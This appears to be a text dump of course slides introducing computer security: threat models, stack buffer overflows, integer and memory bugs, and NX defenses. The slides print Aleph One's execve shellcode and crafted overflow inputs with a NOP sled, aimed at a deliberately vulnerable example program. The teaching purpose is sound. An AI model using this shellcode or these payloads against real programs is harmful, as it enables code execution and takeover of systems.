day 1-1-intro-sw-vuls

Dawn Song 1

Introduction

Computer Security Course. Dawn Song

Dawn Song 2

Intro to Instructor

Aug, 2012

Summer school

Jul, 2007

Prof., UC Berkeley

Sep, 2002

PhD, UC BerkeleyProf., CMU

Born in Dalian, ChinaClose to Korea

http://www.cs.berkeley.edu/[email protected]

http://www.cs.berkeley.edu/~dawnsong

Dawn Song 3

Research Interests & Projects

• Computer security & privacy

• BitBlaze: Binary analysis for computer security

• WebBlaze: New technologies to enhance web security

• DroidBlaze: Android security analysis infrastructure

• Machine learning & security

• Platform for private data

Dawn Song 4

DissectingMalware

BitBlaze Binary Analysis Infrastructure

DetectingVulnerabilities

GeneratingFilters

BitBlaze: Computer Security via Program Binary Analysis

Unified platform to accurately analyze security properties of binaries

Security evaluation & audit of third-party code

Defense against morphing threats

Faster & deeper analysis of malware

Dawn Song 5

WebBlaze: New Security Technologies for the Web

• Does the browser correctly enforce desired security policy?– Cross-origin capability leaks: attacks & defense [USENIX 09]

• Is third-party content such as malicious ads securely sandboxed?– Preventing Capability Leaks in Secure JavaScript Subsets [NDSS10]

• Do browsers & servers have consistent interpretations/views to enforce security properties?– Document Structure Integrity: A Robust Basis for Cross-site Scripting Defense [NDSS09]– Content sniffing XSS: attacks & defense [IEEE S&P 09]

• Do applications have security vulnerabilities?– Symbolic Execution Framework for JavaScript [IEEE S&P10]

• Do different web protocols interact securely?– Model checking web protocols [CSF 10]

• How to build secure web applications by construction?– Context-sensitive auto-sanitization in web applications [CCS 11]

• How to reduce TCB in web applications?– Privilege Separation in HTML5 Applications [USENIX Security 12]

Dawn Song 6

Apps

StaticAnalysis

App Runner VM

Behavior Analysis

DroidBlaze

AnalyzedApps

StaticAnalyzer

AppRewriter

DynamicAnalysis

ExecutionExploration

BehaviorAnalyzer

PropertyChecker

Rewritten App

ExecutionData

bitblaze.cs.berkeley.edu

webblaze.cs.berkeley.edu

droidblaze.cs.berkeley.edu

Dawn Song 8

Intro of Students

• Name• Institution• Areas of interest

– Systems? Programming languages? AI? Theory?• Background in computer security

– Have you taken a computer security class? – Have you done research in computer security?

• Find partners for labs

Dawn Song 9

Overview of Lectures

• Syllabus

• Labs: hands-on experience

• TAs– Dylan– Taebum

Dawn Song 10

Overview of LecturesDate/Time Topic Notes

Part 1: Software Security

Mon Aug 20(09:00-12:00)

Software Security (I.1): Vulnerabilities, Attacks & Defenses. Different classes of vulnerabilities and attacks. Runtime defenses.

(13:00-18:00) Software Security (I.2): Deeper look at vulnerabilities and attacks (Lab Session)

Tues Aug 21(09:00-12:00)

Software Security (II.1): Automatic vulnerability discovery. Static Analysis. Dynamic Analysis. Symbolic Execution

(13:00-18:00) Software Security (II.2): Tools for software security analysis and vulnerability discovery (Lab Session)

Part 2: Web Security

Wed Aug 22(09:00-12:00)

Web Security (I.1): Vulnerabilities & attacks. Overview of web security. Different classes of web vulnerabilities and attacks

(13:00-18:00) Web Security (I.2): Vulnerabilities & attacks. Deeper look at web vulnerabilities & attacks (Lab Session)

Thurs Aug 23(09:00-12:00)

Web Security (II.1): Automatic vulnerability discovery & defense. Automatic analysis techniques and tools to detect web vulnerabilities. New security primitives and mechanisms for defenses

(13:00-18:00) Web Security (II.2): Automatic vulnerability discovery & defense. Deeper look at web defenses

(Lab Session)

Part 3: Malware and Mobile Security

Fri Aug 24(09:00-12:00)

Malware and Mobile Security (1): Overview of malware. Worms and botnets. Overview of mobile security. Different classes of vulnerabilities & attacks. State-of-the-art defenses

(13:00-18:00) Malware and Mobile Security (2): Deeper look at mobile vulnerabilities & attacks (Lab Session)

Dawn Song 11

Introduction to Computer Security:Goals & Threat Models


Dawn Song 12

What is Computer Security About?

• General goals:– Allow intended use of computer systems– Prevent unintended use that may cause harm

• Examples:– Only share your photos & location with friends– Don’t want attackers install key-logger on your

machine to steal your password

Dawn Song 13

Why Should You Care?

• It impacts your day-to-day life

Dawn Song 14

Why Should You Care?

• It impacts everybody’s day-to-day life– Millions of computers compromised– Millions of passwords stolen

Dawn Song 15

What is Computer Security About?

• General goals:– Allow intended use of computer systems– Prevent unintended use that may cause harm

• More precisely…

Dawn Song 16

Basic Security Properties: CIA

• Confidentiality• Integrity• Availability

Dawn Song 17

Basic Security Properties (I)

• Confidentiality: – Information is only disclosed to authorized people or

systems– E.g., attackers cannot learn your banking info

Dawn Song 18

Basic Security Properties (II)

• Integrity:– Information cannot be tampered with in an

unauthorized way – E.g., attacker cannot change the balance of your bank

account

Dawn Song 19

Basic Security Properties (III)

• Availability:– Information and services are accessible in a timely

fashion to authorized people or systems– E.g., you should be able to login and perform

transactions on your online banking account when you want to

Dawn Song 20

Basic Security Properties: CIA

• Confidentiality• Integrity• Availability

Dawn Song 21

Security Analysis

• Given a computer system, one may ask:

Is the computer system secure?

Dawn Song 22

Is the House Secure?

Dawn Song 23

It Depends …

• What are the assets? What are the goals?

Dawn Song 24

It Depends …

• Threat model– In SafeLand, you don’t need to lock the door– Attackers who pick locks– Attackers who drive a bull-dozer– Attackers who have super advanced technology– Attackers who may know you well

Dawn Song 25

Is the House Secure?

• Is the house’s protection mechanism strong enough to protect the assets from attackers in a certain threat model?

Dawn Song 26

Which Threat Model Should You Choose?

?

Dawn Song 27

Cost of Security

• Should you always build & evaluate a system secure against the strongest attacker?– A student may simply not be able to afford an alarm

system• Not about perfect security

Perfect SecurityRisk Analysis

Dawn Song 28

Is the Computer System Secure?

• Is the system’s protection mechanism strong enough to protect the assets & achieve security goals against attackers in a certain threat model?

Dawn Song 29

Key Elements to Security AnalysisSecurity properties

Threat Model

?SecurityAnalysis

Dawn Song 30

Threat Model• Assumptions on attackers’ abilities and resources

0Day

DDoS

Network Eavesdropper

MITM Attack

DES Cracker

Dawn Song 31

Which Threat Models to Choose?

• For the grade database system for your class?• For your phone? • For a major online banking site?• For the system to control nuclear weapon launch?

Dawn Song 32

Cost of Security

• There’s no free lunch.• There’s no free security.• Cost of security

– Expensive to develop– Performance overhead– Inconvenience to users

Dawn Song 33

Prioritize Your Security Solution according to Your Threat Model

• No one wants to pay more for security than what they have to lose

• Not about perfect security– Risk analysis Perfect SecurityRisk Analysis

Dawn Song 34

Changing Threat Model

• Be careful when your threat model changes– E.g., online account

New account, nothing of value; No incentive for attackers

Over time….

Account accumulates value; More incentive for attackers

Dawn Song 35

Design Impacts Cost of Security

• Good system design & architecture can reduce cost of security

Dawn Song 36

Design Impacts Cost of Security

Browser

Known unpatched vulnerabilities

Secunia SecurityFocus

Extremely critical(number / oldest)

Highly critical(number / oldest)

Moderately critical(number / oldest)

Less critical(number / oldest)

Not critical(number / oldest)

Total(number / oldest)

Google Chrome 16 0 0 0 0 0 113 December 2011

Internet Explorer 6 0 0 417 November 2004

827 February 2004

125 June 2003

53420 November 2000

Internet Explorer 7 0 0 130 October 2006

46 June 2006

95 June 2003

21315 August 2006

Internet Explorer 8 0 0 0 126 February 2007

75 June 2003

12314 January 2009

Internet Explorer 9 0 0 0 0 16 December 2011

265 March 2011

Firefox 3.6 0 0 0 0 0 120 December 2011

Firefox 9 0 0 0 0 0 0

Opera 11 0 0 0 0 16 December 2011

26 December 2011

Safari 5 0 0 0 18 June 2010 0 2

13 December 2011

"Vulnerabilities." SecurityFocus. Web. 18 Jan. 2012. <http://www.securityfocus.com/>."Advisories." Secunia. Web. 18 Jan. 2012. <https://secunia.com/community/advisories/>.

Dawn Song 37

Break

Dawn Song 38

Software Security (I): Buffer-overflow Attacks


Dawn Song 39

Intro

SERVER

CLIENT

HTTP REQUEST

HTTP RESPONSE

EXPLOIT

Remote Shell

CLIENT ATTACKER

Linux (32-bit) process memory layout

Reserved for Kernal

user stack

shared libraries

run time heap

static data segment

text segment (program)

unused

-0xC0000000

-0x40000000

-0x08048000

%esp

brk

Loaded from exec

-0x00000000

-0xFFFFFFFF

Stack Frame

user stack

shared libraries

run time heap

static data segment


unused

-0xC0000000

-0x40000000

-0x08048000

-0x00000000

arguments

return address

stack frame pointer

exception handlers

local variables

callee saved registers

To previous stack frame pointer

To the point at which this function was called

Stack Frame

9:int parse(FILE *fp) {10: char buf[5], *url, cmd[128];11: fread(cmd, 1, 128, fp);12: int header_ok = 0;13: if (cmd[0] == ‘G’)14: if (cmd[1] == ‘E’)15: if (cmd[2] == ‘T’)16: if (cmd[3] == ‘ ’)17: header_ok = 1;18: if (!header_ok) return -1;19: url = cmd + 4;20: copy_lower(url, buf);21: printf(“Location is %s\n”, buf);22: return 0; }

1:void copy_lower (char* in, char* out) { 2: int i = 0; 3: while (in[i]!=‘\0’ && in[i]!=‘n’) { 4: out[i] = tolower(in[i]); 5: i++; 6: } 7: buf[i] = ‘\0’; 8:}

A quick example to illustrate multiple stack frames

Viewing Stack Frame with GDB

9:int parse(FILE *fp) {10: char buf[5], *url, cmd[128];11: fread(cmd, 1, 128, fp);12: int header_ok = 0;13: if (cmd[0] == ‘G’)14: if (cmd[1] == ‘E’)15: if (cmd[2] == ‘T’)16: if (cmd[3] == ‘ ’)17: header_ok = 1;18: if (!header_ok) return -1;19: url = cmd + 4;20: copy_lower(url, buf);21: printf(“Location is %s\n”, buf);22: return 0; }


gcc –g parse.c –o parseCompile:

./parseRun:

We can debug using gdb.gdb parse

Then we can take a look at the stack.(gdb) break 7(gdb) run(gdb) x/64x $esp

Debug:

23: /** main to load a file and run parse */

Our example modified to include a main function

parse.c

Viewing Stack Frame with GDB

(gdb) x/64x $espDebug:

Our running example modified to illustrate multiple stack frames

parse.c

What are buffer overflows?

args

ret address

frame ptr

local variables


(Unallocated)

9:int parse(FILE *fp) {10: char buf[5], *url, cmd[128];11: fread(cmd, 1, 256, fp);12: int header_ok = 0;...19: url = cmd + 4;20: copy_lower(url, buf);21: printf(“Location is %s\n”, buf);22: return 0; }



parse.c

BREAK

file

GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

(input file)

BREAK

BREAK

args

ret address

frame ptr

local variables


fpreturn address

stack frame ptr

urlheader_ok buf[4]buf[3,2,1,0]cmd[128,127,126,125]...cmd[7,6,5,4]cmd[3,2,1,0]urlheader_ok

0xbffff75c

0xbffff758

0xbffff74c0xbffff7480xbffff7440xbffff7400xbffff73c

.

.

.0xbffff6c40xbffff6c00xbffff74c0xbffff748

0x0804a008

0x080485a2

0xbffff778

0xbffff6c40x000000010xbfef20dc0xbf02224c0x00000000

...0x414141410x205445470xbffff6c40x00000001

0xbffff760

in

return address

stack frame ptr

i

0xbffff740

0xbffff6c4

0x080485a2

0xbffff758

0x00000000

out0xbffff6b4

0xbffff6b0

0xbffff6ac

0xbffff6a8

0xbffff69c

copy_lower’sframe

parse’sframe


fpreturn address

stack frame ptr


0xbffff75c

0xbffff758


.

.


in

return address

stack frame ptr

i

0x0804a008

0x080485a2

0xbffff778

0xbffff6c40x000000010xbfef20dc0xbf0222610x00000000

...0x414141410x205445470xbffff6c40x00000001

(Unallocated)

0xbffff740

0xbffff6c4

0x080485a2

0xbffff758

0x00000000

out0xbffff6b4

0xbffff6b0

0xbffff6ac

0xbffff6a8

0xbffff69c




parse.c

BREAK 0xbffff760

file


(input file)


fpreturn address

stack frame ptr


0xbffff75c

0xbffff758


.

.


in

return address

stack frame ptr

i

0x0804a008

0x080485a2

0xbffff778


...0x414141410x205445470xbffff6c40x00000001

(Unallocated)

0xbffff740

0xbffff6c4

0x080485a2

0xbffff758

0x00000001

out0xbffff6b4

0xbffff6b0

0xbffff6ac

0xbffff6a8

0xbffff69c




parse.c

BREAK 0xbffff760

file


(input file)


fpreturn address

stack frame ptr


0xbffff75c

0xbffff758


.

.


in

return address

stack frame ptr

i

0x0804a008

0x080485a2

0xbffff778


...0x414141410x205445470xbffff6c40x00000001

(Unallocated)

0xbffff740

0xbffff6c4

0x080485a2

0xbffff758

0x00000002

out0xbffff6b4

0xbffff6b0

0xbffff6ac

0xbffff6a8

0xbffff69c




parse.c

BREAK 0xbffff760

file


(input file)


fpreturn address

stack frame ptr


0xbffff75c

0xbffff758


.

.


in

return address

stack frame ptr

i

0x0804a008

0x080485a2

0xbffff778

0xbffff6c40x000000010xbfef20dc0x616161610x00000000

...0x414141410x205445470xbffff6c40x00000001

(Unallocated)

0xbffff740

0xbffff6c4

0x080485a2

0xbffff758

0x00000003

out0xbffff6b4

0xbffff6b0

0xbffff6ac

0xbffff6a8

0xbffff69c




parse.c

BREAK 0xbffff760

file


(input file)


fpreturn address

stack frame ptr


0xbffff75c

0xbffff758


.

.


in

return address

stack frame ptr

i

0x0804a008

0x080485a2

0xbffff778

0xbffff6c40x000000010xbfef20610x616161610x00000000

...0x414141410x205445470xbffff6c40x00000001

(Unallocated)

0xbffff740

0xbffff6c4

0x080485a2

0xbffff758

0x00000004

out0xbffff6b4

0xbffff6b0

0xbffff6ac

0xbffff6a8

0xbffff69c




parse.c

BREAK 0xbffff760

file


(input file)


fpreturn address

stack frame ptr


0xbffff75c

0xbffff758


.

.


in

return address

stack frame ptr

i

0x0804a008

0x080485a2

0xbffff778

0xbffff6c40x000000010xbfef61610x616161610x00000000

...0x414141410x205445470xbffff6c40x00000001

(Unallocated)

0xbffff740

0xbffff6c4

0x080485a2

0xbffff758

0x00000005

out0xbffff6b4

0xbffff6b0

0xbffff6ac

0xbffff6a8

0xbffff69c




parse.c

BREAK 0xbffff760

file


(input file)

Uh oh….


fpreturn address

stack frame ptr


0xbffff75c

0xbffff758


.

.


in

return address

stack frame ptr

i

0x0804a008

0x080485a2

0xbffff778

0xbffff6c40x000000010xbf6161610x616161610x00000000

...0x414141410x205445470xbffff6c40x00000001

(Unallocated)

0xbffff740

0xbffff6c4

0x080485a2

0xbffff758

0x00000005

out0xbffff6b4

0xbffff6b0

0xbffff6ac

0xbffff6a8

0xbffff69c




parse.c

BREAK 0xbffff760

file


(input file)

Uh oh….


fpreturn address

stack frame ptr


0xbffff75c

0xbffff758


.

.


in

return address

stack frame ptr

i

0x0804a008

0x080485a2

0xbffff778

0x616161610x616161610x616161610x616161610x00000000

...0x414141410x205445470xbffff6c40x00000001

(Unallocated)

0xbffff740

0xbffff6c4

0x080485a2

0xbffff758

0x0000000d

out0xbffff6b4

0xbffff6b0

0xbffff6ac

0xbffff6a8

0xbffff69c

parse.c

0xbffff760

file


(input file)

Uh oh….




BREAK


fpreturn address

stack frame ptr


0xbffff75c

0xbffff758


.

.


in

return address

stack frame ptr

i

0x61616161

0x61616161

0x61616161

0x616161610x616161610x616161610x616161610x00000000

...0x414141410x205445470xbffff6c40x00000001

(Unallocated)

0xbffff740

0xbffff6c4

0x080485a2

0xbffff758

0x00000019

out0xbffff6b4

0xbffff6b0

0xbffff6ac

0xbffff6a8

0xbffff69c

parse.c

0xbffff760

file


(input file)

Uh oh….




BREAK


fpreturn address

stack frame ptr


0xbffff75c

0xbffff758


.

.


in

return address

stack frame ptr

i

0x616161610x616161610x61616161

0x61616161

0x61616161

0x61616161

0x616161610x616161610x616161610x616161610x00000000

...0x414141410x205445470xbffff6c40x00000001

(Unallocated)

0xbffff740

0xbffff6c4

0x080485a2

0xbffff758

0x00000025

out0xbffff6b4

0xbffff6b0

0xbffff6ac

0xbffff6a8

0xbffff69c

parse.c

0xbffff760

file


(input file)

Uh oh….




BREAK


fpreturn address

stack frame ptr


0xbffff75c

0xbffff758


.

.


in

return address

stack frame ptr

i

0x616161610x616161610x61616161

0x61616161

0x61616161

0x61616161

0x616161610x616161610x616161610x616161610x00000000

...0x414141410x205445470xbffff6c40x00000001

(Unallocated)

0xbffff740

0xbffff6c4

0x080485a2

0xbffff758

0x00000025

out0xbffff6b4

0xbffff6b0

0xbffff6ac

0xbffff6a8

0xbffff69c




parse.c

BREAK

0xbffff760

file


(input file)

And when you try to return from parse…… SEGFAULT, since 0x61616161 is not a valid location to return to.

Dawn Song 57

Basic Stack Exploit

• Overwriting the return address allows an attacker to redirect the flow of program control

• Instead of crashing, this can allow arbitrary code to be executed – Code segment called “shellcode”

• Example: the execve system call is used to execute a file– With the correct permissions, execve(“/bin/sh”) can be used to

obtain a root-level shell.

Dawn Song 58

Shellcode of execve

• How to develop shellcode that runs as execve(“/bin/sh”)?

void main() { char *name[2];

name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL);}

0x80002bc <__execve>: pushl %ebp0x80002bd <__execve+1>: movl %esp,%ebp0x80002bf <__execve+3>: pushl %ebx

The procedure prelude.

0x80002c0 <__execve+4>: movl $0xb,%eaxCopy 0xb (11 decimal) onto the stack. This is

the index into the syscall table. 11 is execve.

0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebxCopy the address of "/bin/sh" into EBX.

0x80002c8 <__execve+12>: movl 0xc(%ebp),%ecxCopy the address of name[] into ECX.

0x80002cb <__execve+15>: movl 0x10(%ebp),%edxCopy the address of the null pointer into

%edx.

0x80002ce <__execve+18>: int $0x80Change into kernel mode.

(disassembly of execve call)*

(format instructions and data as characters)*

*For more details, refer to Smashing the stack by aleph one

“\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh”

arguments

return address

stack frame pointer

buffer

ShellCode

crafted return address

buffer

Basic Stack Exploit


To the instruction at which this function was called

“\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh”

So suppose we overflow with a string that looks like the assembly of:Shell Code:exec(“/bin/sh”)

(exact shell code by Aleph One)When the function exits, the user gets shell !!!Note: shellcode runs in stack.

arguments

return address

stack frame pointer

buffer



0xbffff740

0xbffff6c4

0x080485a2

0xbffff758

0x00000019

Basic Stack Exploit

fpreturn address

stack frame ptr

urlheader_ok buf[4]buf[3,2,1,0]cmd[128,127,126,125]..cmd[25,26,27,28]..cmd[7,6,5,4]cmd[3,2,1,0]urlheader_ok

0xbffff75c

0xbffff758


.

.0xbffff7d8

.


in

return address

stack frame ptr

i

0x0804a008

0x080485a2

0x61616161

0x616161610x616161610x616161610x616161610x00000000

.

.0xfffff764

.

.0x414141410x205445470xbffff6c40x00000001

(Unallocated)

out0xbffff6b4

0xbffff6b0

0xbffff6ac

0xbffff6a8

0xbffff69c




parse.c

BREAK 0xbffff760

fileGET AAAAAAAAAAAAAAAAAAAAAAAA\x64\xf7\xff\xffAAAA\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh

(input file)

Basic Stack Exploit


(input file)0xbffff740

0xbffff6c4

0x080485a2

0xbffff758

0x00000019

fpreturn address

stack frame ptr


0xbffff75c

0xbffff758


.

.0xbffff7d8

.


in

return address

stack frame ptr

i

0x0804a008

0x08048564

0x61616161

0x616161610x616161610x616161610x616161610x00000000

.

.0xfffff764

.

.0x414141410x205445470xbffff6c40x00000001

(Unallocated)

out0xbffff6b4

0xbffff6b0

0xbffff6ac

0xbffff6a8

0xbffff69c

0xbffff760




parse.c

BREAK

OVERWRITE POINT!

Basic Stack Exploit



0xbffff6c4

0x080485a2

0xbffff758

0x00000019

fpreturn address

stack frame ptr


0xbffff75c

0xbffff758


.

.0xbffff7d8

.


in

return address

stack frame ptr

i

0x0804a008

0x0804f764

0x61616161

0x616161610x616161610x616161610x616161610x00000000

.

.0xfffff764

.

.0x414141410x205445470xbffff6c40x00000001

(Unallocated)

out0xbffff6b4

0xbffff6b0

0xbffff6ac

0xbffff6a8

0xbffff69c

0xbffff760




parse.c

BREAK

OVERWRITE POINT!

Basic Stack Exploit



0xbffff6c4

0x080485a2

0xbffff758

0x00000019

fpreturn address

stack frame ptr


0xbffff75c

0xbffff758


.

.0xbffff7d8

.


in

return address

stack frame ptr

i

0x0804a008

0x08fff764

0x61616161

0x616161610x616161610x616161610x616161610x00000000

.

.0xfffff764

.

.0x414141410x205445470xbffff6c40x00000001

(Unallocated)

out0xbffff6b4

0xbffff6b0

0xbffff6ac

0xbffff6a8

0xbffff69c

0xbffff760




parse.c

BREAK

OVERWRITE POINT!

0xbffff740

0xbffff6c4

0x080485a2

0xbffff758

0x00000019

fpreturn address

stack frame ptr


0xbffff75c

0xbffff758


.

.0xbffff7d8

.


in

return address

stack frame ptr

i

0x0804a008

0xfffff764

0x61616161

0x616161610x616161610x616161610x616161610x00000000

.

.0xfffff764

.

.0x414141410x205445470xbffff6c40x00000001

(Unallocated)

out0xbffff6b4

0xbffff6b0

0xbffff6ac

0xbffff6a8

0xbffff69c

0xbffff760

Basic Stack Exploit


(input file)

0xbffff764




parse.c

BREAK

OVERWRITE POINT!

Basic Stack Exploit



0xbffff6c4

0x080485a2

0xbffff758

0x00000019

fpreturn address

stack frame ptr


0xbffff75c

0xbffff758

in

return address

stack frame ptr

i

shellcode

0x61616161

0xfffff764

0x61616161

0x616161610x616161610x616161610x616161610x00000000

.

.0xfffff764

.

.0x414141410x205445470xbffff6c40x00000001

(Unallocated)

out0xbffff6b4

0xbffff6b0

0xbffff6ac

0xbffff6a8

0xbffff69c

0xbffff760

0xbffff764


.

.0xbffff7d8

.





parse.c

BREAK

ACTIVATE POINT!

BREAK

Shellcode----------------------------------------

NOPNOP

...NOP


buffer

The NOP Slide

‘/x90’

Problem: how does attacker determine ret-address?

Solution: NOP slide• Guess approximate stack state when the function

is called• Insert many NOPs before Shell Code

arguments

return address

stack frame pointer

buffer



The NOP Slide

fpreturn address

stack frame ptr

urlheader_ok?,?,?,buf[4]buf[3,2,1,0]cmd[128,127,126,125]...cmd[7,6,5,4]cmd[3,2,1,0]urlheader_ok

0xbffff75c

0xbffff758


.

.


shellcode0x909090900x90909090

...0x90909090

0x90909090

0xfffff764

0x61616161

0x616161610x616161610x616161610x616161610x00000000

...0x414141410x205445470xbffff6c40x00000001

(Unallocated)

0xbffff760

fileGET AAAAAAAAAAAAAAAAAAAA\x64\xf7\xff\xff/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh

(input file)

(copy_lower)

0xbffff764




parse.c

BREAK

Dawn Song 68

More on Stack Smashing

• Some complications on Shellcode:– Shellcode should not contain the ‘\0’ character.– Overflow should not crash program before the

frame’s function exits• Sample remote stack smashing overflows:

– (2007) Overflow in Windows animated cursors (ANI).

– (2005) Overflow in Symantic Virus DetectionLoadAniIcon()

test.GetPrivateProfileString “file”, [long string]

Many unsafe libc functions

strcpy (char *dest, const char *src)strcat (char *de st, const char *src)gets (char *s)scanf ( const char *format, … ) and many more.

• “Safe” libc versions strncpy(), strncat() are misleading– e.g. strncpy() may leave string unterminated.

• Windows C run time (CRT):– strcpy_s (*dest, DestSize, *src): ensures proper termination

Dawn Song 70

arguments

return address

stack frame pointer

buffer

ShellCode


buffer



arguments

return address

stack frame pointer

buffer

General Control Hijacking: Return Address

Overwrite Step: Overwrite return address to point to your code.

Activate Step: Return out of frame and into your code.

Dawn Song 71

arguments

return address

stack frame pointer

local function pointerbuffer

ShellCode

crafted local function pointerbuffer

To instructions for a function

arguments

return address

stack frame pointer

local function pointerbuffer

General Control Hijacking: Local Fn Ptr

Overwrite Step: Overwrite local function pointer to point to your code.

Activate Step: Call that local function variable.

Dawn Song 72

General Control Hijacking: Function Pointer in the Heap

Overwrite Step: Overwrite entries in a vtable for Object T.

Activate Step: Call any method from Object T

ptr

data

Object TFP1:

FP2:

FP3:

buffer

vtablemethod #1

method #2

method #3

ptr

data

Object TFP1:

FP2:

FP3:

buffer

vtablemethod #1

method #2

method #3

ptr

data

Object Tcrafted FP1:

crafted FP2:

crafted FP3:

buffer

vtableshellcode

shellcode

shellcode

Dawn Song 73

General Control Hijacking: Function Pointer in the Heap

Overwrite Step: Overwrite pointer to vtable on heap to point to a crafted vtable.

Activate Step: Call any method from Object T

ptr

data

buffer

Object TFP1:

FP2:

FP3:

vtable

method #1

method #2

method #3

ptr

data

buffer

FP1:

FP2:

FP3:

crafted FP1:

crafted FP2:

crafted FP3:

crafted ptr

buffer

vtable

method #1

method #2

method #3

shellcode

shellcode

shellcode

(crafted vtable)

Dawn Song 74

Attack: return-to-libc (arc injection)

• Control hijacking without executing code

arguments

return address

stack frame pointer

buffer

(stack)

exec()

printf()

“/bin/shell”

(libc.so)

Dawn Song 75

General Control Hijacking

Control Flow Pointer

jump to address longjmp pointer

function pointer in heap

return addressframe pointer

exception Handlerfunction pointer as local variable shellcode, library

(return to libc)

Overwrite Step:Find some way to modify a Control Flow Pointer to point to your shellcode, library entry point, or other code of interest.

Activate Step:Find some way to activate that modified Control Flow Pointer.

expected code

Dawn Song 76

Instances of Control HijackingLocation in Memory

Control Flow Pointer

How to activate

Stack Return Address Return from function

Stack Frame Pointer Return from function

Stack Function Pointers as local variables

Reference and call function pointer

Stack Exception Handler Trigger Exception

Heap Function pointer in heap (i.e. method of an object)

Reference and call function pointer

Anywhere setjmp and longjmp program state buffer

Call longjmp

Ret AddrFrame Ptr

buf

(stack frame)

exception handerslocal fn ptrs

ptr

data

Object TFP1:

FP2:

FP3:

vtablemethod #1method #2method #3

(HEAP)

buf

saved pointer

…

other data

longjmp

buf

ptr

data

Object TFP1:

FP2:

FP3:

vtablemethod #1method #2method #3

(HEAP)

buf

Dawn Song 77

arguments

return address

stack frame pointer

authentication_variablebuffer

Data Hijacking

Normal Situation:User types in a password which is stored in the buffer, and if the user is successfully authenticated, the authentication_variable is set.

Modifying data in a way not intended Example: Authentication variable

arguments

return address

stack frame pointer


Exploited Situation:User types in a password which is long enough to overflow buffer and into the authentication_variable. The user is now unintentionally authenticated.

arguments

return address

stack frame pointer


Dawn Song 78

Software Security (II): Other types of software vulnerabilities


Dawn Song 79

Common Coding Errors

• Input validation vulnerabilities

• Memory management vulnerabilities

• TOCTTOU vulnerabilities

Dawn Song 80

Input validation vulnerabilities

• Program requires certain assumptions on inputs to run properly

• Without correct checking for inputs– Program gets exploited

• Example: – Buffer overflow– Format string

Dawn Song 81

Example I

unsigned int size;Data **datalist;

size = GetUntrustedSizeValue();datalist = (data **)malloc(size * sizeof(Data *));for(int i=0; i<size; i++) { datalist[i] = InitData();}datalist[size] = NULL;...

Dawn Song 82

Example II

• char buf[80]; void vulnerable() { int len = read_int_from_network(); char *p = read_string_from_network(); if (len > sizeof buf) { error("length too large, nice try!"); return; } memcpy(buf, p, len);}

• What's wrong with this code?• Hint – memcpy() prototype:

– void *memcpy(void *dest, const void *src, size_t n);

• Definition of size_t: typedef unsigned int size_t;• Do you see it now?

Dawn Song 83

Implicit Casting Bug• Attacker provides a negative value for len

– if won’t notice anything wrong– Execute memcpy() with negative third arg– Third arg is implicitly cast to an unsigned int, and

becomes a very large positive int– memcpy() copies huge amount of memory into buf,

yielding a buffer overrun!• A signed/unsigned or an implicit casting bug

– Very nasty – hard to spot• C compiler doesn’t warn about type mismatch between signed int and unsigned int– Silently inserts an implicit cast

Dawn Song 84

Example III (Integer Overflow)• size_t len = read_int_from_network();

char *buf;buf = malloc(len+5);read(fd, buf, len);...

• What’s wrong with this code?– No buffer overrun problems (5 spare bytes)– No sign problems (all ints are unsigned)

• But, len+5 can overflow if len is too large– If len = 0xFFFFFFFF, then len+5 is 4 – Allocate 4-byte buffer then read a lot more than 4 bytes

into it: classic buffer overrun!• Know programming language’s semantics well to

avoid pitfalls

Dawn Song 85

Example IVchar* ptr = (char*)malloc (SIZE);if (err) {abrt = 1;free(ptr);}...if (abrt) {logError("operation aborted before commit", ptr);}

• Use-after-free• Corrupt memory

http://cwe.mitre.org

Dawn Song 86

Example IVchar* ptr = (char*)malloc (SIZE);

...if (abrt) { free(ptr);}...free(ptr);

• Double-free error• Corrupts memory-management data structure

http://owasp.org

Dawn Song 87

What are software vulnerabilities?

• Flaws in software • Break certain assumptions important for security

– What assumptions broken in buffer overflow?

Dawn Song 88

Why does software have vulnerabilities?

• Programmers are humans!– Humans make mistakes!

• Programmers were not security aware

• Programming languages are not designed well for security

Dawn Song 89

What can you do?

• Programmers are humans!– Humans make mistakes! – Use tools! (next lecture)

• Programmers were not security aware– Learn about different common classes of coding errors

• Programming languages are not designed well for security– Pick better languages

Dawn Song 90

Software Security (III): Buffer-overflow Defenses


Dawn Song 91

Preventing hijacking attacksFix bugs:• Audit software

• Automated tools: Coverity, Prefast/Prefix, Fortify• Rewrite software in a type-safe language (Java, ML)

• Difficult for existing (legacy) code …

Allow overflow, but prevent code execution

Add runtime code to detect overflows exploits:• Halt process when overflow exploit detected• StackGuard, Libsafe

Dawn Song 92

Code Injection Arc Injection

Stack

Heap

Exception Handlers

Control-hijacking Attack Space

Defenses/Mitigations

Dawn Song 93

Defense I: non-execute (W^X)

Prevent attack code execution by marking stack and heap as non-executable

• NX-bit on AMD Athlon 64, XD-bit on Intel P4 Prescott– NX bit in every Page Table Entry (PTE)

• Deployment:

–Linux (via PaX project); OpenBSD–Windows: since XP SP2 (DEP)

• Boot.ini : /noexecute=OptIn or AlwaysOn• Visual Studio: /NXCompat[:NO]

Dawn Song 94

• Limitations:– Some apps need executable heap (e.g. JITs).– Does not defend against `return-to-libc’ exploits


Stack

Heap

Exception Handlers

